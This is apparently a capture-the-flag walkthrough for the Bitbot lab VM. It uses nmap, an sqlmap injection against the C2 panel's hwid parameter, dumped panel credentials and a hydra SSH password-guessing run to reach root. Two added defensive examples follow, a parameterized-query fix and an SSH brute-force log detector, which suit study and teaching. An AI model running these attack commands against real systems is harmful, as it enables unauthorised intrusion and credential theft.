Bit-Bot challenge? Why not? Let's get started!
Nmap scan report for 192.168.1.104
Host is up (0.00068s latency).
MAC Address: 00:0C:29:F8:B4:4E (VMware)

OK, then

root@osboxes:~# nmap -sV -A 192.168.1.104
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-04 13:32 GMT
Nmap scan report for 192.168.1.104
Host is up (0.00075s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
| 1024 e0:dc:be:e9:72:1b:c8:77:40:d2:38:2c:43:c9:b3:49 (DSA)
| 2048 88:e2:0c:77:06:bd:27:5a:14:06:58:c3:d5:41:21:f0 (RSA)
|_ 256 73:11:64:71:a6:c0:a3:f1:60:b5:cf:fa:78:42:5a:a0 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 41291/udp status
|_ 100024 1 50153/tcp status

Nice! Let's check rpcbind

program version netid address service owner
100000 4 tcp6 ::.0.111 portmapper superuser
100000 3 tcp6 ::.0.111 portmapper superuser
100000 4 udp6 ::.0.111 portmapper superuser
100000 3 udp6 ::.0.111 portmapper superuser
100000 4 tcp 0.0.0.0.0.111 portmapper superuser
100000 3 tcp 0.0.0.0.0.111 portmapper superuser
100000 2 tcp 0.0.0.0.0.111 portmapper superuser
100000 4 udp 0.0.0.0.0.111 portmapper superuser
100000 3 udp 0.0.0.0.0.111 portmapper superuser
100000 2 udp 0.0.0.0.0.111 portmapper superuser
100000 4 local /var/run/rpcbind.sock portmapper superuser
100000 3 local /var/run/rpcbind.sock portmapper superuser
100024 1 udp 0.0.0.0.161.75 status 102
100024 1 tcp 0.0.0.0.195.233 status 102
100024 1 udp6 ::.180.8 status 102
100024 1 tcp6 ::.187.192 status 102

Nothing interesting :-) I hope that on port 80 there will be something useful.
But I clicked on the link and...

Grrrr.... So at least we know the Apache version. Dirbuster again...

Ow yeah! admin.php looks great!

SQL Injection does not work on this panel :-( Let's examine the source code. Unfortunately it does not contain any sensitive information. Maybe there is some exploit?
Bitbot C2 Panel gate2.php - Multiple Vulnerabilities

OK! From the exploit we now know that the hwid parameter in gate2.php is vulnerable to SQLi. So,
root@osboxes:~/bitbot# sqlmap -u "http://192.168.1.104/gate2.php?connection=0&hwid=1" -p hwid --level 5 --risk 3 --dbs
available databases [6]:
[*] bitbot
[*] information_schema
[*] mysql
[*] performance_schema
[*] roottext
[*] test

We are looking for some credentials...

Database: bitbot
Table: mining_configs
[2 entries]
+-------+------+-----------------+------+---------+---------+----------+-----------------+---------+
| botid | mode | pass | port | pool | proxy | params | user | threads |
+-------+------+-----------------+------+---------+---------+----------+-----------------+---------+
| all | agr | worker password | port | poolurl | <blank> | -g yes | worker username | default |
| all | idle | worker password | port | poolurl | <blank> | -g no | worker username | default |
+-------+------+-----------------+------+---------+---------+----------+-----------------+---------+

Let's try to log in to BitBot with the credentials. Unfortunately it doesn't work.
We have retrieved the source code of config.php via SQL Injection:

<?php
//Timezone
date_default_timezone_set('Europe/London'); // VISIT http://www.php.net/manual/en/timezones.php For list of timezones
//Admin Configs
$ADMIN_USER_NAME = 'botter'; //panel username
$ADMIN_PASSWORD = 'IF I CAME UP WITH UNIQUE PASSWORDS, I WOULD BE HOME BY NOW'; //panel password
//SQL Configs
$SQL_HOST = 'localhost'; //db host
$SQL_USER_NAME = 'root'; //db user
$SQL_PASSWORD = 'THIS PASSWORD WILL NOT HELP YOU'; //db pass
$SQL_DATABASE = 'bitbot'; //db name
$SQL_CONNECTION = @mysql_connect($SQL_HOST,$SQL_USER_NAME,$SQL_PASSWORD);
//Panel Configs
$BOT_PAGE_MAX = '50';
//Mining Configs
$JSONurl = ''; //follow readme
$apitoken = ''; //follow readme
$apihash = 'hashrate'; //follow readme
$crypto = 'btc'; //btc or ltc
////////////////Do Not Edit Beyond This Point///////////////////////////////////////////
$BOT_CHECKIN_INTERVAL = '60'; //seconds
$CMD_SPLIT = '<\\\\\>';
$CMD_DOWNLOAD = 'DOWN';
$CMD_UPDATE = 'UPDATE';
$CMD_VISIT_SITE = 'VISIT';
$CMD_REMOVE = 'REMOVE';
$CMD_DDOS_STOP = 'STOP';
$CMD_BTC = 'MINE';
$CMD_STOPBTC = 'STOPMINE';
?>

Wonderful! We have a lot of credentials (only two :P)! I am inside!

Interesting! But I didn't find any chance to upload a reverse shell. Let's try to authenticate with the credentials via SSH.
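Two things in that dump explain how the hwid injection got as far as reading config.php: the panel talks to MySQL through the old mysql_* extension, which has no prepared statements, and it connects as the root database user, a privileged account that lets an injection read files off disk. The following is an added example, not code from the Bitbot panel (gate2.php's real query is not on the page): the string-built lookup pattern beside its parameterized form, written in Python with sqlite3 standing in for MySQL. The table layout, column names and sample rows are constructed.

```python
"""Vulnerable vs. parameterized lookup of a bot by its hwid.

Added example, not the Bitbot panel's code. The `bots` table and its rows
are constructed; the query mirrors the pattern the exploit describes
(hwid spliced straight into the SQL text).
"""
import sqlite3


def make_db():
    # In-memory stand-in for the `bitbot` MySQL database (constructed rows).
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE bots (hwid TEXT PRIMARY KEY, ip TEXT, last_seen INTEGER)"
    )
    conn.executemany(
        "INSERT INTO bots VALUES (?, ?, ?)",
        [
            ("1", "10.0.0.5", 1454590000),
            ("2", "10.0.0.6", 1454590060),
            ("3", "10.0.0.7", 1454590120),
        ],
    )
    return conn


def lookup_vulnerable(conn, hwid):
    # The gate2.php-style defect: the request parameter becomes part of the
    # SQL statement, so quotes in it change the statement's structure.
    sql = "SELECT hwid, ip FROM bots WHERE hwid = '" + hwid + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, hwid):
    # Hardened form: the value is bound as a parameter and is only ever
    # compared against the column, never parsed as SQL.
    sql = "SELECT hwid, ip FROM bots WHERE hwid = ?"
    return conn.execute(sql, (hwid,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    tautology = "1' OR '1'='1"  # constructed test input: the textbook tautology
    print("vulnerable:", lookup_vulnerable(db, tautology))  # every row comes back
    print("safe:      ", lookup_safe(db, tautology))        # no hwid equals that literal
```

Parameterizing the query is only half of the fix shown by this VM: the panel should also connect with a database account that owns nothing but the `bitbot` schema, so that even a successful injection cannot reach the file system or other databases.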
Great! We have a limited shell! Let's check what bot.py from the /index.php page is.
botter@Bitbot:~$ cd /var/www/bot/
botter@Bitbot:/var/www/bot$ ls -la
total 12
drwxr--r-- 2 botter root 4096 Aug 21 2013 .
drwxr-xr-x 6 root root 4096 Aug 11 2013 ..
-rw-r--r-- 1 botter root 2418 Aug 11 2013 bot.py

We are allowed to read and write this file. Hmm, I am too weak to do something useful with the file.
Let's look at what we have in our /home directory.
botter@Bitbot:~$ cat gen.sh
ifconfig eth0 | grep inet | grep -v inet6 | awk '{print $2substr(rand(),0,5);}' | awk '{print $0"\n"$0}' | passwd

Hm, we can read and understand bash code. Let's try
root@osboxes:~/bitbot# python -c 'for i in range(100): print "addr:192.168.1.1040."+str(i)' > passwd.txt
root@osboxes:~/bitbot# hydra -l root -P passwd.txt ssh://192.168.1.104 -f -e nsr
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-04 15:13:27
[DATA] 16 tasks, 1 server, 103 login tries (l:1/p:103), ~6 tries per task
[DATA] attacking service ssh on port 22
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[22][ssh] host: 192.168.1.104 login: root password: addr:192.168.1.1040.54
[STATUS] attack finished for 192.168.1.104 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

Great! We are heroes!
Game over!
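The root password gen.sh produces is the interface address followed by a suffix of the form 0.NN, so there are at most a hundred candidates and a password-guessing run over SSH is over in seconds. From the defender's side that same run leaves a dense trail in sshd's log. The following is an added example, not part of the original write-up: a small Python detector over constructed Debian-style /var/log/auth.log lines. It flags a source that reaches a threshold of failed passwords inside a time window, and separately flags a successful login that follows such a burst, which is the guessed-password outcome shown above. The thresholds, the year 2016 (syslog timestamps carry none) and the attacker address 192.168.1.100 are assumptions.

```python
"""Detect SSH password-guessing bursts in sshd log lines.

Added example, not from the original write-up. The log lines are constructed
to resemble the /var/log/auth.log entries a Debian 7-era sshd writes while a
run like the hydra one above hits it; 192.168.1.100 is an assumed attacker
address and 2016 an assumed year.
"""
import re
from collections import defaultdict
from datetime import datetime

FAILED = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(\S+) from (\S+) port \d+"
)
ACCEPTED = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Accepted password for "
    r"(\S+) from (\S+) port \d+"
)

# Constructed sample: six failures in three seconds, then a success from the
# same source, then an unrelated cron line and a normal interactive login.
SAMPLE_LOG = """\
Feb  4 15:13:27 Bitbot sshd[2101]: Failed password for root from 192.168.1.100 port 40102 ssh2
Feb  4 15:13:27 Bitbot sshd[2103]: Failed password for root from 192.168.1.100 port 40103 ssh2
Feb  4 15:13:28 Bitbot sshd[2105]: Failed password for invalid user admin from 192.168.1.100 port 40104 ssh2
Feb  4 15:13:28 Bitbot sshd[2107]: Failed password for root from 192.168.1.100 port 40105 ssh2
Feb  4 15:13:28 Bitbot sshd[2109]: Failed password for root from 192.168.1.100 port 40106 ssh2
Feb  4 15:13:29 Bitbot sshd[2111]: Failed password for root from 192.168.1.100 port 40107 ssh2
Feb  4 15:13:29 Bitbot sshd[2113]: Accepted password for root from 192.168.1.100 port 40108 ssh2
Feb  4 15:13:30 Bitbot CRON[2150]: pam_unix(cron:session): session opened for user root by (uid=0)
Feb  4 15:20:01 Bitbot sshd[2200]: Accepted password for botter from 192.168.1.50 port 51000 ssh2
"""


def parse_ts(text, year=2016):
    # syslog timestamps have no year; one is assumed so they can be compared
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(log_text, max_failures=5, window_seconds=60):
    """Return findings as (source_ip, user, failures_in_window, kind).

    kind is "burst" when a source reaches max_failures failed passwords
    within window_seconds, and "success-after-burst" when a login from that
    source succeeds while such a burst is still inside the window.
    """
    recent_failures = defaultdict(list)  # source ip -> failure timestamps
    already_flagged = set()
    findings = []
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if m:
            ts, user, ip = parse_ts(m.group(1)), m.group(2), m.group(3)
            # keep only failures still inside the window, then add this one
            kept = [t for t in recent_failures[ip]
                    if (ts - t).total_seconds() <= window_seconds]
            kept.append(ts)
            recent_failures[ip] = kept
            if len(kept) >= max_failures and ip not in already_flagged:
                already_flagged.add(ip)
                findings.append((ip, user, len(kept), "burst"))
            continue
        m = ACCEPTED.match(line)
        if m:
            ts, user, ip = parse_ts(m.group(1)), m.group(2), m.group(3)
            kept = [t for t in recent_failures.get(ip, [])
                    if (ts - t).total_seconds() <= window_seconds]
            if len(kept) >= max_failures:
                findings.append((ip, user, len(kept), "success-after-burst"))
    return findings


if __name__ == "__main__":
    for ip, user, n, kind in detect_bruteforce(SAMPLE_LOG):
        print(f"{kind:22s} {ip:16s} user={user} failures={n}")
```

The "success-after-burst" finding is the one worth paging on: a burst alone is background noise on any exposed SSH port, but a success from the same source inside the window means a password was guessed, which is exactly what a password built from the host's own address invites.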